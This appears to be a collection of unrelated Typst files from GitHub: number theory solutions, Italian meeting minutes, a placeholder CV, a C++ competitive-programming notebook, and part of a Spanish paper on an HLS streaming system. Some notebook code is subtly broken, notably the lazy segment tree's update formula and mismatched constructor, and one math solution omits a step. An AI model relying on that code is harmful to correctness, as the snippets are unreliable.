and so $2$ does infact divide $a_0$, contradicting the choice of $a_0$, proving that $2 divides.not [O_k | ZZ[al]]$.
We now replace the minimal polynomial $f(x) = x^3 - 2$ with $f(x+2) = x^3 + 6x^2 + 12 x + 6$. Now the roots of this polynomial in the algebraic closure have all been shifted, but since we have the formula $product_(i,j) (theta_i - theta_j)^2$ for the descriminant where $theta_i$ are the roots, then we know that the discriminant has not changed. Now assume that $3 divides [O_K : ZZ[al]]$, then we have that
$
(b_0 + b_1 (al - 2) + b_2 (al - 2)^2) / 3 in O_k
$
for some $b_0,b_1,b_2$ such that at least one is not divisible by $3$. By the exact same argument as before we have for some $b_i$ that is not divisible by 3
$
27 N_(K quo QQ) (b_i ((al - 2)^2) / 3)
= N_(K quo QQ) (b_i (al - 2)^2)
= b_i^3 (N_(K quo QQ) (al - 2))^2
$
and again we know that $N_(K quo QQ) (al - 2) = 6$ up to a sign. This gives us
$
3 N_(K quo QQ) (b_i ((al - 2)^2) / 3) = 4 b_i^3
$
and so $b_i$ is divisible by 3. This shows that $3 divides.not [O_k : ZZ[al]]$, so since $[O_k : ZZ[al]] divides 108$ this shows that $[O_k : ZZ[al]] = 1$. Hence $O_k = ZZ[al]$ so $O_k$ is monogenic.
#counter(heading).step()
= Question
== Statement
Consider $O_K$ for $K = QQ[theta]$ where $theta$ is a root of $f(X) = X^3 - X - 4$, is it monogenic? Explain.
== Solution
We compute the discriminant, to do so we need to get the minimal polynomial for $theta^2,theta^3$ and $theta^4$. For $theta^2$ we get
$
theta^4 = theta(theta + 4) = theta^2 + 4 theta\
theta^6 = (theta + 4)^2 = theta^2 + 8 theta + 16
$
so
$
(theta^2)^3 - 2 (theta^2)^2 + theta^2 - 16 = 0
$
for $theta^3$ we get
$
theta^3 = theta + 4 \
theta^6 = theta^2 + 8 theta + 16 \
theta^9 = (theta + 4)^3 = theta^3 + 12 theta^2 + 48 theta + 64
= 12 theta^2 + 49 theta + 68
$
so
$
(theta^3)^3 - 12 (theta^3)^2 = -47 theta - 124\
(theta^3)^3 - 12 (theta^3)^2 + 47 (theta^3) = 64.
$
Finally for $theta^4$ we have
$
theta^4 = theta^2 + 4 theta\
theta^8 = (theta^2 + 4 theta)^2 = theta^4 + 8 theta^3 + 16 theta^2
= theta^2 + 4 theta + 8 theta + 32 + 16 theta^2
= 17 theta^2 + 12 theta + 32\
theta^12 = (theta + 4)^4 = theta^4 + 16 theta^3 + 96 theta^2 + 256 theta + 256
= 97 theta^2 + 276 theta + 320
$
so we get
$
(theta^4)^3 - 2 (theta^4)^2 - 63 (theta^4) - 256 = 0.
$
Now the trace is equal to the negative of second coefficient in the minimal polynomial, so we we get $tr(theta) = 0, tr(theta^2) = 2, tr(theta^3) = 12, tr(theta^4) = 2$. Plugging this into a matrix gives us
Now I claim that $ZZ[(theta+theta^2)/2] seq O_K$, first note that if $alpha = (theta + theta^2)/2$ then
$
alpha^2 = (2 theta^2 + 6 theta + 8) / 4\
alpha^3 = 1 / 8 (2 theta^2 + 6 theta + 8)(theta + theta^2)
= 1 / 8 (2 theta^4 + 2 theta^3 + 6 theta^3 + 6 theta^2 + 8theta^2 + 8 theta)
\ = 1 / 8 (2 theta^2 + 8 theta + 8 theta + 32 + 14theta^2 + 8 theta) = 1 / 8 (
16theta^2 + 24 theta + 32
) = 2 theta^2 + 3 theta + 4.
$
Thus we have that $alpha$ is a root of
$
X^3 - X^2 - 3 X - 2 = 0
$
and thus clearly in $O_K$. Now $theta in ZZ[alpha]$ because
$
((theta+theta^2) / 2)^2
- (theta + theta^2) / 2
= (theta^4 + 2 theta^3 + theta^2) / 4 - (theta + theta^2) / 2
\ = (theta^2 + 4theta + 2theta + 8 + theta^2) / 4 - (2theta + 2theta^2) / 4
= (4theta + 8) / 4
= theta + 2
$
so we can consider the discriminant of $1,theta,alpha$. We have
$
tr(theta) = 0, \
tr(alpha) = (tr(theta^2) + tr(theta)) / 2 = 1,\
tr(theta^2) = 2,\
tr(alpha^2) = (2 tr(theta^2) + 6 tr(theta) + tr(8)) / 4 = (4 + 0 +24) / 4 = 7, \
tr(theta alpha) = (tr(theta^3 + theta^2)) / 2
= (tr(theta + 4 + theta^2)) / 2
= (2 + 12) / 2 = 7.
$
This gives us
$
Delta(1,theta,alpha) = det mat(3,0,1;0,2,7;1,7,7) = -107
$
which is prime and thus square free and thus equal to $Delta_K$, meaning that $O_K = ZZ[alpha]$ is monogenic.
|
|
https://github.com/Error-418-SWE/Documenti | https://raw.githubusercontent.com/Error-418-SWE/Documenti/src/3%20-%20PB/Documentazione%20interna/Verbali/24-03-22/24-03-22.typ | typst | #import "/template.typ": *
#show: project.with(
date: "22/03/24",
subTitle: "Meeting post colloquio con il Proponente",
docType: "verbale",
authors: (
"<NAME>",
),
reviewers: (
"<NAME>",
),
missingMembers: (
"<NAME>",
),
timeStart: "16:30",
timeEnd: "17:00",
);
= Ordine del giorno
A seguito dell'incontro con il Proponente, il gruppo ha svolto un meeting interno riguardante:
- Considerazioni scaturite dal meeting esterno;
- Pianificazione.
== Considerazioni scaturite dal meeting esterno
Il gruppo si ritiene soddisfatto dell'incontro svolto, in quanto:
- il Proponente ha apprezzato la UI e le funzionalità del MVP;
- i consigli del Proponente riguardo l'implementazione del collocamento manuale di un prodotto in un bin sono risultati ottimi, in quanto semplificheranno lo sviluppo di tale funzionalità.
== Pianificazione
Non vengono aggiunte nuove task allo Sprint. Si prosegue, dunque, con le attività pianificate in retrospettiva. In particolare, si punta alla conclusione dell'MVP con l'implementazione delle funzionalità mancanti:
- possibilità di muoversi all'interno dell'ambiente tramite tastiera durante il dragging di un prodotto;
- collocamento di un prodotto dalla lista dei non collocati all'interno di un bin vuoto.
= Nota conclusiva
Data la natura dimostrativa del meeting esterno e l'avvicinarsi della conclusione del progetto didattico, non sono emerse ulteriori discussioni. Ogni membro del gruppo è consapevole del lavoro da svolgere e degli obiettivi da raggiungere, concordemente con quanto stabilito e pianificato per lo Sprint corrente. |
|
https://github.com/ice-kylin/typst-cv-miku | https://raw.githubusercontent.com/ice-kylin/typst-cv-miku/main/data.typ | typst | Do What The F*ck You Want To Public License | #import "template.typ": *
#let name = "<NAME>"
#let namezh = "中野三玖"
#let email = [
#icon("email.svg") <EMAIL>
]
#let phone = [
#icon("phone.svg")
(+81) 0906914373641
]
#let home = [
#icon("home.svg")
#link("https://miku.example.com")[ miku.example.com ]
]
#let github = [
#icon("github.svg")
#link("https://miku.example.com")[ miku ]
]
#let linkin = [
#icon("linkedin.svg")
#link("https://miku.example.com")[ <NAME> ]
]
#let author = (
name: name,
email: email,
phone: phone,
home: home,
github: github,
linkin: linkin,
)
#let authorzh = (
name: namezh,
email: email,
phone: phone,
home: home,
github: github,
linkin: linkin,
)
#let selftitle = [ Self Introduction ]
#let selftitlezh = [ 自我总结 ]
#let self = [
#lorem(64)
]
#let selfzh = [
管怀馈犬筹鞘旺增半挂剪吹。励川锂撮菌爷钵梁讽途连和枚反?醛佛奋。篇演靶店寺济枪蔗艇胆历昂遗沾,纲锌妈窖腾奠昆捞经羞幕获豌厚她垅妈轲析夯舰墩璃损傍苷兹仑盒面哪核温藏给录伟助晰言航贸轲洼涉姿妇踪孕。瞎列疾俱寿幅虾夕长坐珠助夏踏蛾阮纸浙恢层融噪拿辐拢厦升体曹呢局?
]
#let edutitle = [ Education ]
#let edutitlezh = [ 教育经历 ]
#let edu = [
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
Tokyo, Japan \
202x - _present_
]
)
#lorem(32)
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
Aichi, Japan \
201x - 201x
]
)
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
Aichi, Japan \
201x - 201x
]
)
]
#let eduzh = [
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
东京, 日本 \
202x - _现在_
]
)
#lorem(32)
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
爱知, 日本 \
201x - 201x
]
)
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
爱知, 日本 \
201x - 201x
]
)
]
#let techtitle = [ Technical Skills ]
#let techtitlezh = [ 技术能力 ]
#let tech = [
- *Programming*: #lorem(8)
- #lorem(8)
- #lorem(8)
- *Key words*: #lorem(8)
- *Tools*: #lorem(8)
- #lorem(8)
- #lorem(8)
]
#let techzh = [
- *编程语言*: #lorem(8)
- #lorem(8)
- #lorem(8)
- *关键字*: #lorem(8)
- *工具*: #lorem(8)
- #lorem(8)
- #lorem(8)
]
#let projecttitle = [ Project Experience ]
#let projecttitlezh = [ 项目经历 ]
#let projectexperience = [
#datedsubsection(
align(left)[
*#lorem(4)* \
Maintainer
],
align(right)[
202x - _present_
]
)
- #lorem(32)
- #lorem(8)
#datedsubsection(
align(left)[
*#lorem(4)* \
Maintainer
],
align(right)[
202x - _present_
]
)
- #lorem(32)
- #lorem(8)
]
#let projectexperiencezh = [
#datedsubsection(
align(left)[
*#lorem(4)* \
维护者
],
align(right)[
202x - _现在_
]
)
- #lorem(32)
- #lorem(8)
#datedsubsection(
align(left)[
*#lorem(4)* \
维护者
],
align(right)[
202x - _现在_
]
)
- #lorem(32)
- #lorem(8)
]
#let activitytitle = [ Activity Experience ]
#let activitytitlezh = [ 活动经历 ]
#let activity = [
#datedsubsection(
align(left)[
*#lorem(8)* \
#lorem(4)
],
align(right)[
202x
]
)
#lorem(32)
#datedsubsection(
align(left)[
*#lorem(8) *\
#lorem(4)
],
align(right)[
202x - _present_
]
)
#lorem(16)
#datedsubsection(
align(left)[
*#lorem(8)* \
#lorem(4)
],
align(right)[
202x
]
)
- #lorem(8)
- #lorem(8)
]
#let activityzh = activity
#let hobbiestitle = [ Hobbies and Interests ]
#let hobbiestitlezh = [ 兴趣爱好 ]
#let hobbies = [
#lorem(32)
- *#lorem(4)*: #lorem(4)
- *#lorem(4)*: #lorem(8)
]
#let hobbieszh = hobbies
|
https://github.com/KrisjanisP/lu-icpc-notebook | https://raw.githubusercontent.com/KrisjanisP/lu-icpc-notebook/main/4-structures.typ | typst | = Data structures
#block(breakable:false,[
== Treap
```cpp
struct Node{
int value, cnt, pri; Node *left, *right;
Node(int p) : value(p), cnt(1), pri(gen()),
left(NULL), right(NULL) {};
};
typedef Node* pnode;
int get(pnode q){if(!q) return 0; return q->cnt;}
void update_cnt(pnode &q){
if(!q) return; q->cnt=get(q->left)+get(q->right)+1;
}
void merge(pnode &T, pnode lef, pnode rig){
if(!lef){T=rig;return;} if(!rig){T=lef;return;}
if(lef->pri>rig->pri){merge(lef->right,lef->right,rig);T=lef;
}else{merge(rig->left, lef, rig->left); T = rig;}
update_cnt(T);
}
void split(pnode cur, pnode &lef, pnode &rig, int key){
if(!cur){lef=rig=NULL;return;} int id=get(cur->left)+1;
if(id<=key){split(cur->right,cur->right,rig,key-id);lef=cur;}
else {split(cur->left, lef, cur->left, key); rig = cur;}
update_cnt(cur);
}
```
])
#block(breakable:false,[
== Lazy segment tree
```cpp
struct SumSegmentTree{
vector<ll> S, O, L; // S: segment tree, O: original, L: lazy
void build(ll ti, ll tl, ll tr){
if(tl==tr){S[ti]=O[tl]; return;}
build(ti*2,tl,(tl+tr)/2);build((ti*2)+1,(tl+tr)/2+1,tr);
S[ti]=S[ti*2]+S[(ti*2)+1];
}
void push(ll ti, ll tl, ll tr){
S[ti] += L[ti]*(tr-tl+1); if(tl==tr){L[ti]=0;return;}
L[ti+ti] += L[ti],L[ti+ti+1] += L[ti]; L[ti] = 0;
}
ll query(ll ti, ll tl, ll tr, ll i, ll j){
push(ti, tl, tr);
if(i<=tl&&tr<=j) return S[ti]; if(tr<i||tl>j) return 0;
ll a = query(ti*2, tl, (tl+tr)/2, i, j);
ll b = query((ti*2)+1, ((tl+tr)/2)+1,tr, i, j);
return a+b;
}
void update(ll ti, ll tl, ll tr, ll i, ll j, ll v){
if(i<=tl&&tr<=j){L[ti]+=v;return;}
if(tr<i||tl>j) return; S[ti]+=v*(i-j+1);
update(ti*2,tl,(tl+tr)/2,i,j,v);
update((ti*2)+1,(tl+tr)/2+1,tr,i,j,v);
};
ST(vector<ll> &V){
O = V; S.resize(O.size()*4, 0); L.resize(O.size()*4, 0);
build(1, 0, O.size()-1);
}
};
```
])
#block(breakable:false,[
== Sparse table
```cpp
const int N, M; //M=log2(N)
int sparse[N][M];
void build() {
for(int i = 0; i < n; i++) sparse[i][0] = v[i];
for(int j = 1; j < M; j++) for(int i = 0; i < n; i++)
sparse[i][j] = i + (1 << j - 1) < n
? min(sparse[i][j - 1], sparse[i + (1 << j - 1)][j - 1])
: sparse[i][j - 1];
}
int query(int a, int b){
int pot = 32 - __builtin_clz(b - a) - 1;
return min(sparse[a][pot], sparse[b - (1 << pot) + 1][pot]);
}
```
])
#block( breakable: false,[
== Fenwick tree
```cpp
struct FenwickTree {
int n;vector<ll> bit; // binary indexed tree
FenwickTree(int n) {this->n=n;bit.assign(n, 0);}
ll sum(int r) {
ll ret=0;
for(;r>=0;r=(r&(r+1))-1) ret+=bit[r];
return ret;
}
ll sum(int l, int r){return sum(r)-sum(l-1);}
void add(int idx, ll delta){
for(;idx<n;idx=idx|(idx+1))bit[idx]+=delta;
}
};
```
])
#block( breakable: false,[
== Trie
```cpp
const int K = 26;
struct Vertex {
int next[K];
bool output = false;
Vertex() {fill(begin(next), end(next), -1);}
};
vector<Vertex> t(1); // trie nodes
void add_string(string const& s) {
int v = 0;
for (char ch : s) {
int c = ch - 'a';
if (t[v].next[c] == -1) {
t[v].next[c] = t.size();
t.emplace_back();
}
v = t[v].next[c];
}
t[v].output = true;
}
```
])
#block( breakable: false,[
== Aho-Corasick
```cpp
const int K = 26;
struct V {
int n[K], go[K], p = -1; // next, go transitions, parent
char ch; // char from parent to this node
bool out = false; // is end of a pattern
int l = -1, d = -1, e = -1; // fail link, depth, exit length
V(int parent = -1, char c = '$') : p(parent), ch(c) {
fill(n, n + K, -1); // initialize transitions
fill(go, go + K, -1); // initialize go transitions
}
};
vector<V> t(1);
void add_string(const string& s){ // Add a string to the trie
int v = 0;
for(char c : s){
int ci = c - 'a';
if(t[v].n[ci] == -1){
t[v].n[ci] = t.size();
t.emplace_back(v, c); // create new node
}
v = t[v].n[ci];
}
t[v].out = true; // mark end of pattern
}
int go_func(int v, char c);
int get_link(int v){ // Get the fail link for node v
if(t[v].l == -1){
if(v == 0 || t[v].p == 0) t[v].l = 0;
else t[v].l = go_func(get_link(t[v].p), t[v].ch);
} return t[v].l;
}
// Compute the transition for node v with character c
int go_func(int v, char c){
int ci = c - 'a';
if(t[v].go[ci] == -1){
if(t[v].n[ci] != -1) t[v].go[ci] = t[v].n[ci];
else t[v].go[ci] = (v==0) ? 0 : go_func(get_link(v),c);
}
return t[v].go[ci];
}
```
])
#block( breakable: false,[
== Disjoint Set Union
```cpp
struct DSU {
vector<int> p, r; // p: parent, r: rank
DSU(int n) {
p.resize(n); r.resize(n);
for (int i = 0; i < n; i++) p[i] = i;
}
int f(int a){if (p[a] == a) return a; return p[a] = f(p[a]);}
void unite(int a, int b) {
a = f(a), b = f(b); if (a == b) return;
if (r[a] < r[b]) p[a] = b; else if (r[a] > r[b]) p[b] = a;
else {p[b] = a; r[a]++;}
}
};
```
])
#block( breakable: false,[
== Merge sort tree
```cpp
struct MergeSortTree{
int size; vector<vector<ll>> values;
void init(int n){
size=1; while(size<n) size*=2;
values.resize(size*2, vector<ll>());
}
void build(vector<ll> &arr, int x, int lx, int rx){
if(rx-lx==1){
if(lx<arr.size()) values[x].push_back(arr[lx]);
else values[x].push_back(-1);
return;
}
int m=(lx+rx)/2;
build(arr,2*x+1,lx,m);
build(arr,2*x+2,m,rx);
int i=0, j=0, asize=values[2*x+1].size();
while(i<asize && j<values[2*x+2].size()){
if(values[2*x+1][i]<values[2*x+2][j])
values[x].push_back(values[2*x+1][i++]);
else values[x].push_back(values[2*x+2][j++]);
}
while(i<asize)
values[x].push_back(values[2*x+1][i++]);
while(j<values[2*x+2].size())
values[x].push_back(values[2*x+2][j++]);
}
void build(vector<ll> &arr){ build(arr,0,0,size); }
int calc(int l, int r, int x, int lx, int rx, int k){
if(lx>=r || rx<=l) return 0;
if(lx>=l && rx<=r){
int lft=-1, rght=values[x].size();
while(rght-lft>1){
int mid=(lft+rght)/2;
if(values[x][mid]<k) lft=mid;
else rght=mid;
}
return lft+1;
}
int m=(lx+rx)/2;
return calc(l,r,2*x+1,lx,m,k) + calc(l,r,2*x+2,m,rx,k);
}
int calc(int l, int r, int k){ return calc(l,r,0,0,size,k); }
};
```
])
#block(breakable: false, [
== janY mass operations segment tree
```cpp
struct item { ll x; item(ll x=0) : x(x) {} };
struct segtree {
int size; vector<item> values, ops;
item NEUTRAL=0, DEFAULT=0, NOOP=0;
item modify_op(item a, item b, ll len) {
a.x += b.x*len; return a; }
void apply_mod_op(item &a, item b, ll len) {
a = modify_op(a, b, len); }
item calc_op(item a, item b) { return item(a.x + b.x); }
void init(int n) {
size=1; while(size<n) size<<=1;
values.assign(size<<1, DEFAULT);
ops.assign(size<<1, NOOP);
}
void build(vector<item> &arr, int x=0, int lx=0, int rx=-1) {
if(rx==-1) rx = size;
if(rx - lx ==1) {
values[x] =
(lx < arr.size()) ? arr[lx] : NEUTRAL; return;
}
int m=(lx+rx)/2;
build(arr,2*x+1,lx,m);
build(arr,2*x+2,m,rx);
values[x] = calc_op(values[2*x+1], values[2*x+2]);
}
void propagate(int x, int lx, int rx) {
if(rx - lx ==1) return;
int m=(lx+rx)/2;
apply_mod_op(ops[2*x+1], ops[x],1);
apply_mod_op(values[2*x+1], ops[x],m-lx);
apply_mod_op(ops[2*x+2], ops[x],1);
apply_mod_op(values[2*x+2], ops[x],rx-m);
ops[x] = NOOP;
}
void set(int l, int r, ll v, int x=0, int lx=0, int rx=-1) {
if(rx==-1) rx = size; propagate(x, lx, rx);
if(lx >= r || rx <= l) return;
if(lx >= l && rx <= r) {
apply_mod_op(ops[x], item(v),1);
apply_mod_op(values[x], item(v), rx-lx); return;
}
int m=(lx+rx)/2;
set(l,r,v,2*x+1,lx,m); set(l,r,v,2*x+2,m,rx);
values[x] = calc_op(values[2*x+1], values[2*x+2]);
}
item calc(int l, int r, int x=0, int lx=0, int rx=-1) {
if(rx==-1) rx = size; propagate(x, lx, rx);
if(lx >= r || rx <= l) return NEUTRAL;
if(lx >= l && rx <= r) return values[x];
int m=(lx+rx)/2;
return
calc_op(calc(l,r,2*x+1,lx,m), calc(l,r,2*x+2,m,rx));
}
};
```
])
#block( breakable: false,[
== janY fenwick tree range update
```cpp
struct fenwick { // range update
ll *bit1, *bit2; int fsize;
void init(int n){
fsize=n; bit1=new ll[n+1](); bit2=new ll[n+1]();
}
ll getSum(ll BIT[], int i){
ll s=0; i++; while(i>0){ s += BIT[i]; i -= i & -i; }
return s;
}
void updateBIT(ll BIT[], int i, ll v){
i++; while(i <= fsize){ BIT[i] += v; i += i & -i; }
}
ll sum(int x){
return getSum(bit1,x)*x - getSum(bit2,x);
}
void add(int l, int r, ll v){
updateBIT(bit1,l,v); updateBIT(bit1,r+1,-v);
updateBIT(bit2,l,v*(l-1)); updateBIT(bit2,r+1,-v*r);
}
ll calc(int l, int r){
return sum(r) - sum(l-1);
}
};
```
])
#block( breakable: false,[
== Persistent segment tree
```cpp
#define V struct Vertex
struct Vertex { V *l, *r; ll sum;
Vertex(ll val){l=r=nullptr; sum=val;}
Vertex(V* le, V* ri){l=le;r=ri;sum=(l?l->sum:0)+(r?r->sum:0);}
};
int siz;
vector<V*> start_nodes;
V* build(int lx, int rx, vl &a){
if (lx == rx-1) return new V(a[lx]);
return new V(build(lx,(lx+rx)/2,a),build((lx+rx)/2,rx,a));
}
V* build(vl &a){ siz = a.size(); return build(0, siz, a); }
ll calc(V* v, int lx, int rx, int l, int r){
if(lx >= r || rx <= l) return 0;
if(lx >= l && rx <= r) return v->sum;
int m = (lx + rx) / 2;
return calc(v->l, lx, m, l, r) + calc(v->r, m, rx, l, r);
}
ll calc(V* v, int l, int r){
if (l>r) return 0;
return calc(v,0,siz,l,r);
}
V* upd(V* v, int lx, int rx, int i, ll val){
if(lx == rx-1) return new V(val);
int m = (lx + rx) / 2;
if (i < m) return new V(upd(v->l, lx, m, i, val), v->r);
else return new V(v->l, upd(v->r, m, rx, i, val));
}
V* upd(V* v, int i, ll val){ return upd(v, 0, siz, i, val); }
```
])
|
|
https://github.com/zSnails/StreamX | https://raw.githubusercontent.com/zSnails/StreamX/master/paper/doc.typ | typst | #import "template.typ": ieee_conference as ieee
// #import "@preview/charged-ieee:0.1.2": ieee
#let keywords = (
"HTTP Live Streaming (HLS)",
"StreamX",
"Multimedia content delivery",
"Scalability",
"Load balancing",
"PostgreSQL blob storage",
"Network performance",
"Real-time streaming"
)
#let title = [StreamX: Streaming Over HLS]
#set document(author: ("<NAME>", "<NAME>"), keywords: keywords, date: datetime.today(), title: title)
#set heading(bookmarked: true)
#show: ieee.with(
title: title,
abstract: [
The StreamX system is designed to handle large volumes of simultaneous
requests for multimedia content delivery using the HTTP Live Streaming
(HLS) protocol. The architecture is based on a scalable structure that
includes a load balancer, a Go server, and blob storage in PostgreSQL.
The system allows users to stream video and audio without downloading
entire files, offering a real-time experience similar to platforms like
Netflix. Performance tests under adverse network conditions, such as
packet loss and limited bandwidth, demonstrated the system's adaptive
behavior, stabilizing over time despite initial spikes in blocked or
failed requests. In optimal network environments, the system operates
without failures, confirming its efficiency in handling multimedia
content delivery.
],
authors: (
(
name: "<NAME>",
department: [Developer],
organization: [ITCR],
location: [Santa Clara, San Carlos],
email: "<EMAIL>"
),
(
name: "<NAME>",
department: [Developer],
organization: [ITCR],
location: [Santa Clara, San Carlos],
email: "<EMAIL>"
),
),
index-terms: keywords,
bibliography-file: "refs.bib",
//bibliography: bibliography("refs.bib")
)
#set text(lang: "es")
= Diseño Arquitectónico
#set smartquote(alternative: true)
#figure(image("./diagramv2.svg"),
caption: [
System's Architectural Design
]
)
El diseño arquitectónico de StreamX se basa en una infraestructura escalable y
eficiente para la entrega de contenido multimedia mediante el protocolo HTTP
Live Streaming (HLS) @pantos2017http. El sistema está compuesto por varios componentes
distribuidos que colaboran para asegurar una experiencia de usuario fluida y
rápida, capaz de manejar múltiples solicitudes simultáneas.
El frontend de StreamX está constituido por una interfaz de usuario que puede
ser accedida a través de navegadores web en plataformas de escritorio. Esta
interfaz permite a los usuarios explorar el catálogo de contenido multimedia,
como videos y música, y enviar solicitudes de reproducción. Las interacciones
entre los usuarios y el sistema se realizan mediante solicitudes HTTP, que
inician el proceso de entrega de contenido.
En el backend, Nginx @soni2016nginx desempeña un papel crucial como balanceador de carga y
proxy inverso. Su función es recibir las solicitudes HTTP de los usuarios y
distribuirlas de manera eficiente entre las diferentes instancias del servidor
backend implementado en Go. Este balanceo de carga permite que el sistema
maneje grandes volúmenes de tráfico sin sobrecargar una sola instancia, lo que
asegura la alta disponibilidad y escalabilidad de la plataforma.
El Servidor de Go @tsoukalos2019mastering es el núcleo del backend y gestiona toda la lógica de negocio del
sistema. Cuando una solicitud es redirigida desde Nginx, el servidor en Go se
encarga de procesarla, lo que incluye la autenticación del usuario y la
validación de la solicitud. A partir de este punto, el Servidor de Go consulta la
base de datos PostgreSQL @douglas2003postgresql, que actúa como el sistema de almacenamiento principal
para los archivos multimedia y los metadatos relacionados. PostgreSQL almacena
los videos y las canciones como blobs@blob @shapiro1999managing, permitiendo un acceso eficiente a
grandes volúmenes de datos, mientras que los metadatos como títulos, autores y
duración se gestionan a través de consultas SQL.
#footnote("Binary Large Object") <blob>
Una vez que el Servidor de Go obtiene el contenido multimedia desde PostgreSQL,
utiliza el protocolo HLS para dividir los archivos en fragmentos pequeños, los
cuales son entregados al cliente de manera escalonada. Esto permite a los
usuarios comenzar a reproducir el contenido sin tener que descargar el archivo
completo, lo que mejora la experiencia de transmisión en tiempo real. Los
fragmentos de video o audio son enviados al usuario a través de Nginx, que se
encarga de gestionar la conexión entre el servidor y el cliente final.
El flujo completo del sistema comienza con una solicitud de reproducción por
parte del usuario, que es recibida por Nginx y redirigida al Servidor de Go. El
servidor procesa la solicitud, obtiene los datos necesarios desde PostgreSQL ,
y luego entrega los fragmentos HLS de vuelta al usuario para su reproducción.
Este proceso asegura una experiencia fluida y de alta calidad, similar a la que
ofrecen servicios como Netflix o Spotify.
// #image("../diagrams/diagram.svg")
// #image("../diagrams/components.svg")
= Informe de Rendimiento
Los datos presentados en esta sección no representan métricas absolutas
para una única conexión. En su lugar, son una amalgama de los promedios de los
datos recopilados de 10 usuarios virtuales utilizados en las pruebas de
rendimiento. Cada gráfico refleja el comportamiento promedio de estas
múltiples conexiones simultáneas, lo que permite una visión más general del
rendimiento del sistema bajo condiciones de carga representativas.
== Usuario Subiendo un Video
Las pruebas relacionadas a un usuario subiendo un video fueron simuladas
mediante el uso de `k6`, estas se simularon con un total de 10 usuarios
virtuales en un periodo de 10 segundos.
=== Peticiones Http Bloquadas
==== 20% Pérdida de Paquetes
#figure(caption: [Http Requests Blocked Over Time \@ 20% Packet Loss], image("./k6/user-uploading-video-20p-packet-loss-http_req_blocked_plot.svg")) <fig1>
El gráfico proporcionado en la Fig. @fig1 muestra las métricas relacionadas con el
bloqueo de solicitudes HTTP a lo largo del tiempo bajo una configuración de
red con un 20% de pérdida de paquetes. En el eje X se representa el tiempo,
mientras que el eje Y muestra la cantidad de solicitudes bloqueadas. A partir
de la observación de este gráfico, es posible extraer varios aspectos clave
sobre el comportamiento del sistema bajo estas condiciones adversas de red.
En la fase inicial del período de observación, se aprecia un aumento rápido en
la cantidad de peticiones bloqueadas, alcanzando un máximo cercano a 1.0 en el
eje Y. Este incremento inicial sugiere que, durante el inicio del período de
prueba, hubo una alta cantidad de solicitudes HTTP bloqueadas, probablemente
debido a la pérdida de paquetes que impide que las solicitudes lleguen al
servidor de manera adecuada. Este comportamiento es típico en entornos de red
con pérdida de paquetes, especialmente al inicio de una prueba de carga, donde el
sistema aún no ha ajustado sus mecanismos para compensar dicha pérdida.
Posteriormente, el gráfico muestra una caída abrupta en la cantidad de
solicitudes bloqueadas, la cual casi llega a 0 en un corto período de tiempo.
Esta caída rápida sugiere que el sistema se ha recuperado o adaptado
momentáneamente a las condiciones de la red, lo que reduce drásticamente el
número de solicitudes bloqueadas. Esta respuesta puede deberse a diversos
factores, como mecanismos automáticos de recuperación, retransmisiones de las
solicitudes bloqueadas o ajustes internos que permiten mejorar temporalmente
el procesamiento de las solicitudes a pesar de la pérdida de paquetes en la
red.
Tras esta recuperación inicial, se observa una estabilización en la métrica de
peticiones bloqueadas, con fluctuaciones pequeñas que se mantienen alrededor
de valores bajos, aproximadamente entre 0.1 y 0.2. Esto indica que, aunque el
sistema logra estabilizarse, no ha alcanzado un estado completamente óptimo,
ya que las pequeñas variaciones sugieren que sigue lidiando con las
condiciones adversas de la red, aunque en menor medida que al inicio del
periodo.
==== 500kbits de Ancho de Banda
#figure(caption: [Http Requests Blocked Over Time \@ 500kbits bandwidth], image("./k6/user-uploading-video-500kbit-http_req_blocked_plot.svg")) <fig2>
El gráfico proporcionado en la Fig. @fig2 muestra la cantidad de solicitudes
HTTP bloqueadas a lo largo del tiempo bajo una condición de red con un ancho
de banda limitado a 500kbits. Este escenario simula una red con ancho de banda
reducido, lo que afecta directamente el rendimiento de las solicitudes.
En el eje X se visualiza el tiempo, mientras que en el eje Y se muestra la
cantidad de solicitudes HTTP bloqueadas. El análisis de este gráfico revela un
comportamiento interesante del sistema bajo estas condiciones.
Inicialmente, el gráfico muestra un valor elevado de solicitudes bloqueadas,
cercano a 0.5, lo que indica que, al comienzo de la prueba, la red limitada en
ancho de banda resulta en una alta cantidad de solicitudes bloqueadas. Este
comportamiento es esperable, dado que la baja velocidad de transmisión de
datos restringe la capacidad del sistema para procesar eficazmente las
solicitudes en los primeros momentos de la prueba.
Después de este pico inicial, la cantidad de solicitudes bloqueadas disminuye
gradualmente, alcanzando un valor más bajo cercano a 0.1. Este descenso
refleja que el sistema se ajusta a las limitaciones de ancho de banda,
posiblemente mediante la adaptación de los mecanismos de control de flujo o
las políticas de retransmisión. A pesar de esta mejora, el sistema no alcanza
una estabilidad total, como lo demuestran las fluctuaciones observadas en los
datos posteriores.
El gráfico evidencia un patrón oscilante en la cantidad de solicitudes
bloqueadas después de la caída inicial, con valores que varían entre 0.1 y 0.2
en diferentes momentos. Esto indica que el sistema sigue experimentando
dificultades para manejar el tráfico de solicitudes bajo un ancho de banda
restringido, aunque de forma menos severa que al inicio de la prueba. Las
fluctuaciones sugieren que, aunque se logra un cierto nivel de adaptación, el
sistema no consigue eliminar por completo los bloqueos debido a la falta de
recursos de red.
==== Configuración de Red Óptima
#figure(caption: [Http Blocked Requests Over Time \@ Optimal Settings], image("./k6/uploading-video-http_req_blocked_plot.svg")) <fig3>
El gráfico proporcionado en la Fig. @fig3, que ilustra la cantidad de
solicitudes HTTP bloqueadas bajo una configuración de red óptima, destaca
varios aspectos importantes sobre el comportamiento del sistema. A diferencia
de los escenarios anteriores con limitaciones de red, este gráfico refleja el
desempeño del servidor en un entorno sin restricciones significativas. Sin
embargo, los resultados permitieron identificar que los parámetros de
configuración del servidor no eran adecuados para las demandas del sistema, en
particular en relación con el mecanismo de rate limit que implementamos.
Desde el inicio de la prueba, se observa un pico en la cantidad de solicitudes
bloqueadas, alcanzando un valor de 0.6. A pesar de la disminución rápida que
se produce posteriormente, donde la cantidad de solicitudes bloqueadas cae por
debajo de 0.2, se siguen observando fluctuaciones menores en los valores a lo
largo del tiempo. Estas oscilaciones, con variaciones que se mueven entre 0.1
